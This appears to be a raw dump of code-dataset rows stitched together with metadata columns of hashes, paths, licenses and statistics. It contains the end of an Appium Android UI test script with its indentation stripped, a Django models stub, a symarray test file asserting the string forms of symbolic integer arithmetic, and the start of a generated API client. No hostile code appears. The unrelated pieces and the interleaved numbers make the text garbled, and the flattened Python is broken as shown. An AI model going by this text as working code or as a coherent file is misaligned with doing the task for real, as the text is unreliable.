desired_caps['unicodeKeyboard'] = True
desired_caps['resetKeyboard'] = True
desired_caps['app'] = PATH('C:/Users/Administrator/Downloads/pda-debug.apk')
desired_caps['appPackage'] = 'com.chanjet.tpluspda'
desired_caps['appActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
desired_caps['appWaitPackage'] = 'com.chanjet.tpluspda'
#desired_caps['appWaitActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
desired_caps['newCommandTimeout'] = 3600
desired_caps['noReset'] = True
global wd,screenRatioX,screenRatioY,touchAction
self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
wd = self.driver
wd.implicitly_wait(60)
touchAction = TouchAction(wd)
#record device width*height
originScreenWidth = 480.0
originScreenHeight = 800.0
windows_size = wd.get_window_size()
currentWidth = windows_size.get('width')
currentHeight = windows_size.get('height')
screenRatioX = currentWidth/originScreenWidth
screenRatioY = currentHeight/originScreenHeight
def tearDown(self):
wd.quit()
global p
p = subprocess.Popen(["C:\\Testwa\\Generator\\TestwaServer\\node.exe", "C:\\Testwa\\Generator\\TestwaServer\\build\\lib\\main.js"])
if p:
p.terminate()
def testTestwa(self):
global wd,screenRatioX,screenRatioY,touchAction,p
reload(sys)
sys.setdefaultencoding( "utf-8" )
#START_TO_RECORD_SCRIPT
while True:
try_time = 10;
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='1']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.TextView[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='3']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ScrollView[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='3']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.TextView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.LinearLayout[@index='0']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.CheckBox[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.Button[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.TextView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='2']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.TextView[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.TextView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.LinearLayout[@index='1']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.CheckBox[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.Button[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.LinearLayout[@index='2']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
if try_time < 0:
if p:
p.terminate()
p.wait()
wd.quit()
p = subprocess.Popen(["C:\\Testwa\\Generator\\TestwaServer\\node.exe", "C:\\Testwa\\Generator\\TestwaServer\\build\\lib\\main.js"])
sleep(10)
desired_caps = {}
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1'
desired_caps['deviceName'] = 'MT66-2WA-8D00375'
desired_caps['unicodeKeyboard'] = True
desired_caps['resetKeyboard'] = True
desired_caps['app'] = PATH('C:/Users/Administrator/Downloads/pda-debug.apk')
desired_caps['appPackage'] = 'com.chanjet.tpluspda'
desired_caps['appActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
desired_caps['appWaitPackage'] = 'com.chanjet.tpluspda'
#desired_caps['appWaitActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
desired_caps['newCommandTimeout'] = 3600
desired_caps['noReset'] = True
self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
wd = self.driver
wd.implicitly_wait(60)
touchAction = TouchAction(wd)
print 'restart...'
if __name__ == '__main__':
unittest.main(verbosity=2)
| 48.808081
| 253
| 0.563397
| 1,605
| 14,496
| 4.932087
| 0.094704
| 0.157655
| 0.180015
| 0.216018
| 0.89856
| 0.893128
| 0.88858
| 0.874053
| 0.873926
| 0.873926
| 0
| 0.024645
| 0.300221
| 14,496
| 296
| 254
| 48.972973
| 0.755718
| 0.048772
| 0
| 0.850746
| 0
| 0.085821
| 0.325686
| 0.291128
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.033582
| null | null | 0.003731
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9427f49da1e9c349fa7624c02e63d5f87cae63d7
| 175
|
py
|
Python
|
japps/models.py
|
aliceminotto/cyverse_website
|
48432341b269059036c4a1b761a4cace2ffff92c
|
[
"MIT"
] | 1
|
2017-04-22T11:46:37.000Z
|
2017-04-22T11:46:37.000Z
|
japps/models.py
|
cyverseuk/cyverse_website
|
48432341b269059036c4a1b761a4cace2ffff92c
|
[
"MIT"
] | 2
|
2020-02-12T10:35:17.000Z
|
2021-06-10T19:09:16.000Z
|
japps/models.py
|
cyverseuk/cyverse_website
|
48432341b269059036c4a1b761a4cace2ffff92c
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.core.validators import RegexValidator
#@python_2_unicode_compatible
| 19.444444
| 61
| 0.862857
| 24
| 175
| 6.041667
| 0.583333
| 0.206897
| 0.193103
| 0.331034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012658
| 0.097143
| 175
| 8
| 62
| 21.875
| 0.905063
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84bf1ad8ac0d6137fa5c5ccfea241dfcafc0c1da
| 15,596
|
py
|
Python
|
symarray/symarray/calculus/tests/test_integers.py
|
costrouc/uarray
|
c3c42147181a88265942ad5f9cf439467f746782
|
[
"BSD-3-Clause"
] | null | null | null |
symarray/symarray/calculus/tests/test_integers.py
|
costrouc/uarray
|
c3c42147181a88265942ad5f9cf439467f746782
|
[
"BSD-3-Clause"
] | null | null | null |
symarray/symarray/calculus/tests/test_integers.py
|
costrouc/uarray
|
c3c42147181a88265942ad5f9cf439467f746782
|
[
"BSD-3-Clause"
] | null | null | null |
from symarray.calculus.integers import Integer, Int
def test_integer():
a = Integer('a')
b = Integer('b')
c = Integer('c')
d = Integer('d')
assert str(a) == 'a'
assert str(+a) == 'a'
assert str(a + b) == 'a + b'
assert str(a + 1) == '1 + a'
assert str(1 + a) == '1 + a'
assert str(a + 0) == 'a'
assert str(a + a) == '2 * a'
assert str(a + a + a) == '3 * a'
assert str(a + a + b) == '2 * a + b'
assert str(a + b + a) == '2 * a + b'
assert str ((a+b) + (c)) == 'a + b + c'
assert str ((a) + (b+c)) == 'a + b + c'
assert str ((a+b) + (c+d)) == 'a + b + c + d'
assert str ((a+b) + (c+c)) == 'a + b + 2 * c'
assert str ((a+a) + (c+d)) == '2 * a + c + d'
assert str ((a+b) + 2) == '2 + a + b'
assert str(-a) == '-a'
assert str(a-a) == '0'
assert str(a-b) == 'a - b'
assert str ((a+b) - 2) == '-2 + a + b',repr((a+b)-2)
assert str (2 + (a+b)) == '2 + a + b'
assert str (-2 + (a+b)) == '-2 + a + b'
assert str ((a+b) - (c+d)) == 'a + b - c - d'
assert str ((a+b) - (c+c)) == 'a + b - 2 * c'
assert str (a - (c+d)) == 'a - c - d'
assert str ((a+b) - (c+c-d)) == 'a + b - 2 * c + d'
assert str (a * 2) == '2 * a'
assert str (2 * a) == '2 * a'
assert str (-2 * a) == '-2 * a'
assert str (1 * a) == 'a'
assert str (-1 * a) == '-a'
assert str (a * 2 * 3) == '6 * a'
assert str (2 * a * 3) == '6 * a'
assert str (a * b) == 'a * b'
assert str (a * a) == 'a ** 2'
assert str (a / a) == '1'
assert str (a ** 2) == 'a ** 2'
assert str (a * b * 2) == '2 * a * b'
assert str (2 * a * b) == '2 * a * b'
assert str (a * b * c) == 'a * b * c'
assert str (a * (b * c)) == 'a * b * c'
assert str ((a+b)*c) == 'a * c + b * c'
assert str (c*(a+b)) == 'a * c + b * c'
assert str ((a+b)*(c+d)) == 'a * c + a * d + b * c + b * d'
assert str ((a+b)*(a+b)) == '2 * a * b + a ** 2 + b ** 2'
assert str ((a+b)**2) == '2 * a * b + a ** 2 + b ** 2'
assert str ((a+b)**2*(a+b)) == '3 * a * b ** 2 + 3 * a ** 2 * b + a ** 3 + b ** 3'
assert str ((a+b)*(a+b)**2) == '3 * a * b ** 2 + 3 * a ** 2 * b + a ** 3 + b ** 3'
assert str ((a+b)**3) == '3 * a * b ** 2 + 3 * a ** 2 * b + a ** 3 + b ** 3'
assert str ((a+b)*2) == '2 * a + 2 * b'
assert str ((a+b)*c*2) == '2 * a * c + 2 * b * c'
assert str ((a*b)*2) == '2 * a * b'
assert str (Int(2)*(a*b)) == '2 * a * b'
assert str ((a*b)**2) == 'a ** 2 * b ** 2'
assert str ((a*b)**(Int(1)/2)) == '(a * b) ** 1/2'
def test_number():
n = Int(2)
m = Int(3)
assert str(+n)=='2'
assert str(-n)=='-2'
assert str(n+m)=='5'
assert str(n+3)=='5'
assert str(2+m)=='5'
assert str(n-m)=='-1'
assert str(n-3)=='-1'
assert str(2-m)=='-1'
assert str(n*m)=='6'
assert str(n*3)=='6'
assert str(2*m)=='6'
assert str(n/m)=='2/3'
assert str(n/3)=='2/3'
assert str(2/m)=='2/3'
assert str(n**m)=='8'
assert str(n**3)=='8'
assert str(2**m)=='8'
def test_number_calculus():
n = Int(2)
a = Integer('a')
b = Integer('b')
assert str(+a)=='a'
assert str(-a)=='-a'
assert str(a + n)=='2 + a'
assert str(a + 2)=='2 + a'
assert str(n + a)=='2 + a'
assert str(2 + a)=='2 + a'
assert str(a - n)=='-2 + a'
assert str(a - 2)=='-2 + a'
assert str(n - a)=='2 - a'
assert str(2 - a)=='2 - a'
assert str(a * n)=='2 * a',repr(a * n)
assert str(a * 2)=='2 * a'
assert str(n * a)=='2 * a'
assert str(2 * a)=='2 * a'
assert str(a / n)=='1/2 * a'
assert str(a / 2)=='1/2 * a'
assert str(a ** n)=='a ** 2'
assert str(a ** 2)=='a ** 2'
assert str(n ** a)=='2 ** a'
assert str(2 ** a)=='2 ** a'
c = a + a
assert str(+c) == '2 * a'
assert str(-c) == '-2 * a'
assert str(c + n) == '2 + 2 * a'
assert str(n + c) == str (c+n)
assert str(c + 2) == str (c+n)
assert str(2 + c) == str (c+n)
assert str(c - n) == '-2 + 2 * a'
assert str(c - 2) == str (c-n)
assert str(n - c) == '2 - 2 * a'
assert str(2 - c) == str (n-c)
assert str(c * n) == '4 * a'
assert str(c * 2) == str(c * n)
assert str(n * c) == str(c * n)
assert str(2 * c) == str(c * n)
assert str(c / n) == 'a'
assert str(c / 2) == str(c / n)
assert str(n / c) in ['a ** -1', 'a ** (-1)'], repr(n/c)
assert str(2 / c) == str(n / c)
assert str(c ** n) == '4 * a ** 2'
assert str(c ** 2) == str(c ** n)
assert str(n ** c) == '2 ** (2 * a)'
assert str(n ** c) == str(2 ** c)
c = a + b
assert str(+c) == 'a + b'
assert str(-c) == '-a - b'
assert str(c + n) == '2 + a + b'
assert str(n + c) == str(c + n)
assert str(c + 2) == str(c + n)
assert str(2 + c) == str(c + n)
assert str(c - n) == '-2 + a + b'
assert str(c - 2) == str(c - n)
assert str(n - c) == '2 - a - b'
assert str(2 - c) == str(n - c)
assert str(c * n) == '2 * a + 2 * b'
assert str(c * 2) == str(c * n)
assert str(n * c) == str(c * n)
assert str(2 * c) == str(c * n)
assert str(c / n) == '1/2 * a + 1/2 * b'
assert str(c / 2) == str(c / n)
assert str(n / c) in ['2 * (a + b) ** -1', '2 * (a + b) ** (-1)'],repr((n/c))
assert str(2 / c) == str(n / c)
assert str(c ** n) == '2 * a * b + a ** 2 + b ** 2'
assert str(c ** 2) == str(c ** n)
assert str(n ** c) == '2 ** (a + b)'
assert str(n ** c) == str(2 ** c)
c = a * b
assert str(+c) == 'a * b'
assert str(-c) == '-a * b'
assert str(c + n) == '2 + a * b'
assert str(c + 2) == str(c + n)
assert str(n + c) == str(c + n)
assert str(2 + c) == str(c + n)
assert str(c - n) == '-2 + a * b'
assert str(c - 2) == str(c - n)
assert str(n - c) == '2 - a * b'
assert str(2 - c) == str(n - c)
assert str(c * n) == '2 * a * b'
assert str(c * 2) == str(c * n)
assert str(n * c) == str(c * n)
assert str(2 * c) == str(c * n)
assert str(c / n) == '1/2 * a * b'
assert str(c / 2) == str(c / n)
assert str(n / c) in ['2 * a ** -1 * b ** -1', '2 * a ** (-1) * b ** (-1)']
assert str(2 / c) == str(n / c)
assert str (c ** n) == 'a ** 2 * b ** 2'
assert str (c ** 2) == str (c**n)
assert str (n ** c) == '2 ** (a * b)'
assert str (2 ** c) == str (n ** c)
c = a * a
assert str(+c) == 'a ** 2'
assert str(-c) == '-a ** 2'
assert str(c + n) == '2 + a ** 2'
assert str(c + 2) == str(c + n)
assert str(n + c) == str(c + n)
assert str(2 + c) == str(c + n)
assert str(c - n) == '-2 + a ** 2'
assert str(c - 2) == str(c - n)
assert str(n - c) == '2 - a ** 2'
assert str(2 - c) == str(n - c)
assert str(c * n) == '2 * a ** 2'
assert str(c * 2) == str(c * n)
assert str(n * c) == str(c * n)
assert str(2 * c) == str(c * n)
assert str(c / n) == '1/2 * a ** 2'
assert str(c / 2) == str(c / n)
assert str(n / c) in ['2 * a ** -2', '2 * a ** (-2)']
assert str(2 / c) == str(n / c)
assert str (c ** n) == 'a ** 4'
assert str (c ** 2) == str (c**n)
assert str (n ** c) == '2 ** (a ** 2)'
assert str (2 ** c) == str (n ** c)
def test_integer_calculus():
a = Integer('a')
b = Integer('b')
c = Integer('c')
assert str(a + b) == 'a + b'
assert str(a + a) == '2 * a'
assert str(a - b) == 'a - b'
assert str(a - a) == '0'
assert str(a * b) == 'a * b'
assert str(a * a) == 'a ** 2'
assert str(a / b) in ['a * b ** -1', 'a * b ** (-1)']
assert str(b / a) in ['a ** -1 * b', 'a ** (-1) * b']
assert str(a ** b) == 'a ** b',repr(a ** b)
x = b + c
assert str(a + x) == 'a + b + c'
assert str(x + a) == str(a + x)
assert str(a - x) == 'a - b - c'
assert str(x - a) == '-a + b + c'
assert str(a * x) == 'a * b + a * c'
assert str(x * a) == str(a * x)
assert str(a / x) in ['a * (b + c) ** -1', 'a * (b + c) ** (-1)']
assert str (x / a) in ['a ** -1 * b + a ** -1 * c', 'a ** (-1) * b + a ** (-1) * c']
assert str(a ** x) == 'a ** (b + c)'
assert str(x ** a) == '(b + c) ** a'
x = b + b
assert str(a + x) == 'a + 2 * b'
assert str(x + a) == str(a + x)
assert str(a - x) == 'a - 2 * b'
assert str(x - a) == '-a + 2 * b'
assert str(a * x) == '2 * a * b'
assert str(x * a) == str(a * x)
assert str(a / x) in ['1/2 * a * b ** -1', '1/2 * a * b ** (-1)']
assert str (x / a) in ['2 * a ** -1 * b', '2 * a ** (-1) * b']
assert str(a ** x) == 'a ** (2 * b)'
assert str(x ** a) == '(2 * b) ** a'
x = b * c
assert str(a + x) == 'a + b * c'
assert str(x + a) == str(a + x)
assert str(a - x) == 'a - b * c'
assert str(x - a) == '-a + b * c'
assert str(a * x) == 'a * b * c'
assert str(x * a) == str(a * x)
assert str(a / x) in ['a * b ** -1 * c ** -1', 'a * b ** (-1) * c ** (-1)']
assert str (x / a) in ['a ** -1 * b * c', 'a ** (-1) * b * c']
assert str(a ** x) == 'a ** (b * c)'
assert str(x ** a) == '(b * c) ** a'
x = b * b
assert str(a + x) == 'a + b ** 2'
assert str(x + a) == str(a + x)
assert str(a - x) == 'a - b ** 2'
assert str(x - a) == '-a + b ** 2'
assert str(a * x) == 'a * b ** 2'
assert str(x * a) == str(a * x)
assert str(a / x) in ['a * b ** -2', 'a * b ** (-2)']
assert str (x / a) in ['a ** -1 * b ** 2', 'a ** (-1) * b ** 2']
assert str(a ** x) == 'a ** (b ** 2)'
assert str(x ** a) in ['b ** (2 * a)', '(b ** 2) ** a']
def test_terms_calculus():
a = Integer('a')
b = Integer('b')
c = Integer('c')
d = Integer('d')
x = a + b
assert str (x + x) == '2 * a + 2 * b'
assert str (x - x) == '0'
assert str (x * x) == '2 * a * b + a ** 2 + b ** 2'
assert str (x / x) == '1'
assert str (x ** x) == '(a + b) ** (a + b)'
y = c + d
assert str (x + y) == 'a + b + c + d'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a + b - c - d'
assert str (y - x) == '-a - b + c + d'
assert str (x * y) == 'a * c + a * d + b * c + b * d'
assert str (x / y) in ['(a + b) * (c + d) ** -1', '(a + b) * (c + d) ** (-1)', 'a * (c + d) ** (-1) + b * (c + d) ** (-1)']
assert str (x ** y) == '(a + b) ** (c + d)'
y = c * d
assert str (x + y) == 'a + b + c * d'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a + b - c * d'
assert str (y - x) == '-a - b + c * d'
assert str (x * y) == 'a * c * d + b * c * d'
assert str (x / y) in ['a * c ** -1 * d ** -1 + b * c ** -1 * d ** -1', 'a * c ** (-1) * d ** (-1) + b * c ** (-1) * d ** (-1)']
assert str (x ** y) == '(a + b) ** (c * d)'
assert str (y ** x) == '(c * d) ** (a + b)'
y = c * c
assert str (x + y) == 'a + b + c ** 2'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a + b - c ** 2'
assert str (y - x) == '-a - b + c ** 2'
assert str (x * y) == 'a * c ** 2 + b * c ** 2'
assert str (x / y) in ['a * c ** -2 + b * c ** -2', 'a * c ** (-2) + b * c ** (-2)']
assert str (x ** y) == '(a + b) ** (c ** 2)'
assert str (y ** x) in ['c ** (2 * a + 2 * b)', '(c ** 2) ** (a + b)']
x = a + a
y = c + d
assert str (x + x) == '4 * a'
assert str (x - x) == '0'
assert str (x * x) == '4 * a ** 2'
assert str (x / x) == '1',repr((x / x, x, (1/x)))
assert str (x ** x) == '(2 * a) ** (2 * a)'
assert str (x + y) == '2 * a + c + d'
assert str (y + x) == str (x + y)
assert str (x - y) == '2 * a - c - d'
assert str (y - x) == '-2 * a + c + d'
assert str (x * y) == '2 * a * c + 2 * a * d'
assert str (x / y) in ['2 * a * (c + d) ** -1', '2 * a * (c + d) ** (-1)']
assert str (x ** y) == '(2 * a) ** (c + d)'
assert str (y ** x) == '(c + d) ** (2 * a)'
y = c + c
assert str (x + y) == '2 * a + 2 * c'
assert str (y + x) == str (x + y)
assert str (x - y) == '2 * a - 2 * c'
assert str (y - x) == '-2 * a + 2 * c'
assert str (x * y) == '4 * a * c'
assert str (x / y) in ['a * c ** -1', 'a * c ** (-1)']
assert str (x ** y) == '(2 * a) ** (2 * c)'
assert str (y ** x) == '(2 * c) ** (2 * a)'
y = c * d
assert str (x + y) == '2 * a + c * d'
assert str (y + x) == str (x + y)
assert str (x - y) == '2 * a - c * d'
assert str (y - x) == '-2 * a + c * d'
assert str (x * y) == '2 * a * c * d'
assert str (x / y) in ['2 * a * c ** -1 * d ** -1', '2 * a * c ** (-1) * d ** (-1)']
assert str (x ** y) == '(2 * a) ** (c * d)'
assert str (y ** x) == '(c * d) ** (2 * a)'
y = c * c
assert str (x + y) == '2 * a + c ** 2'
assert str (y + x) == str (x + y)
assert str (x - y) == '2 * a - c ** 2'
assert str (y - x) == '-2 * a + c ** 2'
assert str (x * y) == '2 * a * c ** 2'
assert str (x / y) in ['2 * a * c ** -2', '2 * a * c ** (-2)']
assert str (x ** y) == '(2 * a) ** (c ** 2)'
assert str (y ** x) in ['c ** (4 * a)','(c ** 2) ** (2 * a)']
def test_factors_calculus ():
a = Integer('a')
b = Integer('b')
c = Integer('c')
d = Integer('d')
x = a * b
assert str (x + x) == '2 * a * b'
assert str (x - x) == '0'
assert str (x * x) == 'a ** 2 * b ** 2'
assert str (x / x) == '1'
assert str (x ** x) == '(a * b) ** (a * b)'
y = c * d
assert str (x + y) == 'a * b + c * d'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a * b - c * d'
assert str (y - x) == '-a * b + c * d'
assert str (x * y) == 'a * b * c * d'
assert str (x / y) in ['a * b * c ** -1 * d ** -1', 'a * b * c ** (-1) * d ** (-1)']
assert str (x ** y) == '(a * b) ** (c * d)'
y = c * c
assert str (x + y) == 'a * b + c ** 2'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a * b - c ** 2'
assert str (y - x) == '-a * b + c ** 2'
assert str (x * y) == 'a * b * c ** 2'
assert str (y * x) == str(x * y)
assert str (x / y) in ['a * b * c ** -2', 'a * b * c ** (-2)']
assert str (y / x) in ['a ** -1 * b ** -1 * c ** 2', 'a ** (-1) * b ** (-1) * c ** 2']
assert str (x ** y) in ['(a * b) ** (c ** 2)', '(a * b) ** c ** 2']
assert str (y ** x) in ['c ** (2 * a * b)', '(c ** 2) ** (a * b)', 'c ** 2 ** (a * b)',
]
x = a * a
assert str (x + x) == '2 * a ** 2'
assert str (x - x) == '0'
assert str (x * x) == 'a ** 4'
assert str (x / x) == '1'
assert str (x ** x) in ['a ** (2 * a ** 2)', '(a ** 2) ** (a ** 2)', 'a ** 2 ** a ** 2',
]
y = c * d
assert str (x + y) == 'a ** 2 + c * d'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a ** 2 - c * d'
assert str (y - x) == '-a ** 2 + c * d'
assert str (x * y) == 'a ** 2 * c * d'
assert str (x / y) in ['a ** 2 * c ** -1 * d ** -1', 'a ** 2 * c ** (-1) * d ** (-1)']
assert str (x ** y) in ['a ** (2 * c * d)', '(a ** 2) ** (c * d)', 'a ** 2 ** (c * d)',
]
y = c * c
assert str (x + y) == 'a ** 2 + c ** 2'
assert str (y + x) == str (x + y)
assert str (x - y) == 'a ** 2 - c ** 2'
assert str (y - x) == '-a ** 2 + c ** 2'
assert str (x * y) == 'a ** 2 * c ** 2'
assert str (y * x) == str(x * y)
assert str (x / y) in ['a ** 2 * c ** -2', 'a ** 2 * c ** (-2)']
assert str (y / x) in ['a ** -2 * c ** 2', 'a ** (-2) * c ** 2']
assert str (x ** y) in ['a ** (2 * c ** 2)', '(a ** 2) ** (c ** 2)', 'a ** 2 ** c ** 2',
]
assert str (y ** x) in ['c ** (2 * a ** 2)','(c ** 2) ** (a ** 2)','c ** 2 ** a ** 2',
]
| 33.684665
| 132
| 0.364645
| 2,880
| 15,596
| 1.971181
| 0.011111
| 0.535846
| 0.167342
| 0.10657
| 0.946451
| 0.909283
| 0.868769
| 0.848159
| 0.806236
| 0.770654
| 0
| 0.047733
| 0.357912
| 15,596
| 462
| 133
| 33.757576
| 0.519173
| 0
| 0
| 0.323155
| 0
| 0.015267
| 0.251764
| 0
| 0
| 0
| 0
| 0
| 0.860051
| 1
| 0.015267
| false
| 0
| 0.002545
| 0
| 0.017812
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
84d8a03c0d9efb0bc5c608c6d6750e15eb25619b
| 37,624
|
py
|
Python
|
leiaapi/generated/api/job_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
leiaapi/generated/api/job_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
leiaapi/generated/api/job_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LEIA RESTful API for AI
Leia API # noqa: E501
